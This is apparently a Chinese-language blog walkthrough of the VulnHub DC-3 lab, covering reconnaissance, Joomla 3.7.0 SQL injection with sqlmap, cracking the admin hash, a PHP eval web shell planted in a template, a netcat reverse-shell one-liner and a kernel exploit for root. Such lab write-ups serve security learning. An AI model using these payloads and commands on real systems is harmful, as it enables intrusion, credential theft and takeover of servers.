记对VnlnHub_DC-3的一次渗透测试

2024-06-08 384 0

VulnHub_DC-3 渗透测试笔记

攻击前准备

DC-3虚拟机文件夹压缩包

链接:https://pan.baidu.com/s/1kZ9RNflZSmV4Vr2UmyMA1g
提取码:d9cz
--来自百度网盘超级会员V6的分享

1.若出现报错提醒:

记对VnlnHub_DC-3的一次渗透测试插图

2.选择编辑虚拟机设置后,移除CD/DVD

记对VnlnHub_DC-3的一次渗透测试插图1

3.修改网卡为NAT模式

记对VnlnHub_DC-3的一次渗透测试插图2

4.成功进入DC-3

记对VnlnHub_DC-3的一次渗透测试插图3

信息收集

1.扫描同网段主机IP

arp-scan -l

记对VnlnHub_DC-3的一次渗透测试插图4

2.深度扫描靶机IP

nmap -T4 -A -p 0-65535 10.10.10.4

扫描出80端口开放

记对VnlnHub_DC-3的一次渗透测试插图5

3.访问目标靶机的网站主页

记对VnlnHub_DC-3的一次渗透测试插图6

4.利用dirb扫描url

dirb http://10.10.10.4

记对VnlnHub_DC-3的一次渗透测试插图7

5.扫描出后台管理页面,直接访问

http://10.10.10.4/administrator/ 

发现网页是由Joomla的CMS框架搭建

记对VnlnHub_DC-3的一次渗透测试插图8

6.使用joomscan扫描目标url

(JoomScan):是一个开源项目,旨在自动执行Joomla CMS部署中的漏洞检测和可靠性保证任务。该工具在Perl中实现,可以无缝轻松地扫描Joomla安装,同时通过其轻量级和模块化架构留下最小的占地面积。它不仅可以检测已知的攻击性漏洞,还能够检测到许多错误配置和管理员级别的缺陷,这些缺陷可被攻击者利用来破坏系统。

常用工具篇 ]渗透神器OWASPJoomScan安装使用详解-CSDN博客

joomscan -u http://10.10.10.4

扫描结果:

Joomla版本: 3.7.0

后台管理页面: http://10.10.10.4/administrator/

记对VnlnHub_DC-3的一次渗透测试插图9

SQL注入漏洞

超详细SQLMap使用攻略及技巧分享 - 锦瑟,无端 - 博客园 (cnblogs.com)

1.在sploitdb中搜索3.7.0版本的joomla

searchsploit joomla 3.7.0 

记对VnlnHub_DC-3的一次渗透测试插图10

2.查询漏洞说明所在位置

find / -name 42033.txt 

记对VnlnHub_DC-3的一次渗透测试插图11

3.查看漏洞说明

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

#url漏洞点复现
URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27

#利用Sqlmap攻击漏洞语句
Using Sqlmap:
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
#localhost处替换为靶机IP

记对VnlnHub_DC-3的一次渗透测试插图12

4.URL漏洞点复现

记对VnlnHub_DC-3的一次渗透测试插图13

5.利用Sqlmap进行漏洞攻击

爆破数据库

sqlmap.bat -u "http://10.10.10.4/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

记对VnlnHub_DC-3的一次渗透测试插图14

输入Y

在GET参数'list[fullordering]'上测试SQL注入,看起来后端DBMS是“MySQL”。是否要跳过特定于其他DBMS的测试有效负载?[Y/n]

记对VnlnHub_DC-3的一次渗透测试插图15

输入N

GET参数'list[fullordering]'易受攻击。你想继续测试其他人(如果有的话)吗?[是/否]

记对VnlnHub_DC-3的一次渗透测试插图16

成功爆破出joomladb

记对VnlnHub_DC-3的一次渗透测试插图17

爆破数据表

sqlmap.bat -u "http://10.10.10.4/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

记对VnlnHub_DC-3的一次渗透测试插图18

记对VnlnHub_DC-3的一次渗透测试插图19

猜测以下两个数据表可能存放用户名密码

记对VnlnHub_DC-3的一次渗透测试插图20

记对VnlnHub_DC-3的一次渗透测试插图21

#__users表存放用户名密码可能性更大

爆破字段

sqlmap.bat -u "http://10.10.10.4/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p list[fullordering]

注意:"#__users" 此处有引号,防止后面语句被注释

记对VnlnHub_DC-3的一次渗透测试插图22

输入y,确认使用

[18:05:44][警告]无法检索数据库'joomladb'中表'#__users'的列名
是否要使用公共列存在性检查?[y/N/q]y

记对VnlnHub_DC-3的一次渗透测试插图23

键入回车键,使用默认字典即可

[18:05:50][警告]如果出现连续的数据检索问题,建议您尝试切换“--no cast”或切换“--hex”
您想使用哪个常用列(单词列表)文件?
[1] 默认“D:\Global\apps\sqlmap\1.7.9\data\txt\common columns.txt”(按Enter键)
[2] 自定义
>

记对VnlnHub_DC-3的一次渗透测试插图24

成功爆破出username跟password

记对VnlnHub_DC-3的一次渗透测试插图25

爆破表数据

sqlmap.bat -u "http://10.10.10.4/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C "username,password" --dump -p list[fullordering]

记对VnlnHub_DC-3的一次渗透测试插图26

成功爆破出用户名密码

username:  admin 
password:                             $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
#发现密码为hash值,且被加盐

记对VnlnHub_DC-3的一次渗透测试插图27

john破解密码

密码破解-john的使用 - Junglezt - 博客园 (cnblogs.com)

1.将哈希密码写入a.txt

记对VnlnHub_DC-3的一次渗透测试插图28

2.成功破解出明文

john a.txt

snoopy

记对VnlnHub_DC-3的一次渗透测试插图29

3.得出joomla后台管理页面用户名密码

用户名:admin
密码:snoopy

文件上传漏洞利用

1.利用破解的用户名密码登录后台管理页面

记对VnlnHub_DC-3的一次渗透测试插图30

成功登录网站后台

记对VnlnHub_DC-3的一次渗透测试插图31

2.进入网站拓展页面

Extensions-Templates-Templates

记对VnlnHub_DC-3的一次渗透测试插图32

3.点击Beez3 Details and Files进入模板

记对VnlnHub_DC-3的一次渗透测试插图33

4.点击New File,在模板里新建文件

记对VnlnHub_DC-3的一次渗透测试插图34

5.发现存在文件上传漏洞,且可上传php脚本文件,并创建shell.php文件

记对VnlnHub_DC-3的一次渗透测试插图35

6.写入一句话木马至shell.php,并点击Save保存

<?php @eval($_POST[cmd]); ?>
注意:"cmd" 即为蚁剑连接密码

记对VnlnHub_DC-3的一次渗透测试插图36

7.通过百度得知joomla上传文件路径,并访问shell.php

返回页面为空,说明木马已经在服务器成功运行

10.10.10.4/templates/beez3/shell.php

记对VnlnHub_DC-3的一次渗透测试插图37

获取WebShell

1.通过蚁剑连接,成功获取网站WebShell

记对VnlnHub_DC-3的一次渗透测试插图38

2.进入虚拟终端

记对VnlnHub_DC-3的一次渗透测试插图39

获取到www-data权限

记对VnlnHub_DC-3的一次渗透测试插图40

反弹Shell

反弹Shell原理及检测技术研究 - 郑瀚Andrew - 博客园 (cnblogs.com)

1.打开NetCat(瑞士军刀)

Linux 命令(138)—— nc 命令-腾讯云开发者社区-腾讯云 (tencent.com)

记对VnlnHub_DC-3的一次渗透测试插图41

2.查看当前目录下文件,发现nc.exe与nc64.exe

记对VnlnHub_DC-3的一次渗透测试插图42

3.nc开启监听6666端口,如有防火墙警报,点允许访问即可

nc64.exe -lvvp 6666

记对VnlnHub_DC-3的一次渗透测试插图43

4.输入反弹Shell命令

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.17 6666 >/tmp/f

记对VnlnHub_DC-3的一次渗透测试插图44

成功获取反弹Shell

记对VnlnHub_DC-3的一次渗透测试插图45

5.获取交互式Shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

记对VnlnHub_DC-3的一次渗透测试插图46

权限提升(内核漏洞)

权限提升(内核漏洞)脚本下载链接

链接:https://pan.baidu.com/s/1xBHJ41gH72D_SDlGuEfUvQ?pwd=3ufi
提取码:3ufi
--来自百度网盘超级会员V3的分享

###请下载后再进行后续操作

1.通过蚁剑上传内核漏洞检测脚本到/tmp目录

记对VnlnHub_DC-3的一次渗透测试插图47

2.在shell中查看已成功上传,但是没有执行权限

记对VnlnHub_DC-3的一次渗透测试插图48

3.添加执行权限

chmod 777 linux-exploit-suggester.sh

记对VnlnHub_DC-3的一次渗透测试插图49

4.执行漏洞检测脚本

./linux-exploit-suggester.sh
或者
bash linux-exploit-suggester.sh

记对VnlnHub_DC-3的一次渗透测试插图50

发现存在很多漏洞

记对VnlnHub_DC-3的一次渗透测试插图51

5.利用CVE-2016-4557高危漏洞

记对VnlnHub_DC-3的一次渗透测试插图52

#下载链接
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip

6.通过蚁剑上传至/tmp目录

记对VnlnHub_DC-3的一次渗透测试插图53

上传成功

记对VnlnHub_DC-3的一次渗透测试插图54

7.解压文件

unzip 39772.zip

记对VnlnHub_DC-3的一次渗透测试插图55

8.进入目录

#移动至39772
#解压exploit.tar文件
#移动至ebpf_mapfd_doubleput_exploit

cd 39772
tar -vxf exploit.tar
cd ebpf_mapfd_doubleput_exploit

记对VnlnHub_DC-3的一次渗透测试插图56

9.查看目录下的文件,发现需要执行的文件没有执行权限

记对VnlnHub_DC-3的一次渗透测试插图57

10.添加执行权限

chmod 777 compile.sh
chmod 777 doubleput.c

记对VnlnHub_DC-3的一次渗透测试插图58

11.运行相关文件

记对VnlnHub_DC-3的一次渗透测试插图59

成功提权至root

记对VnlnHub_DC-3的一次渗透测试插图60

12.cd到/root目录,发现flag

记对VnlnHub_DC-3的一次渗透测试插图61

13.cat查看flag

记对VnlnHub_DC-3的一次渗透测试插图62

flag
 __        __   _ _   ____                   _ _ _ _
 \ \      / /__| | | |  _ \  ___  _ __   ___| | | | |
  \ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
   \ V  V /  __/ | | | |_| | (_) | | | |  __/_|_|_|_|
    \_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
Congratulations are in order.  :-)
I hope you've enjoyed this challenge as I enjoyed making it.
If there are any ways that I can improve these little challenges,
please let me know.
As per usual, comments and complaints can be sent via Twitter to @DCAU7
Have a great day!!!!

#祝贺按顺序排列。:-),我希望你和我一样喜欢这个挑战。如果有什么方法可以改善这些小挑战,请告诉我。和往常一样,评论和投诉可以通过推特发送到@DCAU7。祝你有美好的一天!!!!

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论